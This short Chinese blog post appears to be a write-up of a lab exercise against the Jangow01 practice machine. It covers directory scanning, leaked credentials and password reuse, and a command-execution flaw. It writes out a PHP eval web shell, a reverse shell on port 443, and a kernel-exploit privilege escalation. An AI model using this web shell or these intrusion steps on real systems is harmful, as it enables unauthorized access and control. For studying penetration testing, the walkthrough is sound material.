扫描打点
关于
CMS
,exploitdb
出来的两个漏洞都不能用dirsearch
扫出来.backup
,拿到用户名和密码jangow01:abygurl69
但好像是数据库的密码?但没对外开放数据库,看看有没有刚见过的密码复用
连连
ftp
试试:去
var/www/html
下翻一翻,找到这个,能命令执行:getshell
命令执行传一句话
echo '<?php @eval($_POST['qwq']); ?>' >> qwq.php
蚁剑连一下,然后转
msf
但这里反弹
shell
一直失败换用
443
端口然后提示
su: must be run from a terminal
搜到这篇文章 ,要用
python
调用本地shell
然后继续密码复用就提权了
Linux
内核提权学长提示对于老机器都可以搜一下内核
发现正好可以用
拿蚁剑传上去,
gcc
编译一下,执行生成的a.out
就行
学长的任务罢了1-jangow01
- 本文链接: http://noone40404.github.io/2024/09/14/学长的任务罢了1:jangow01/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!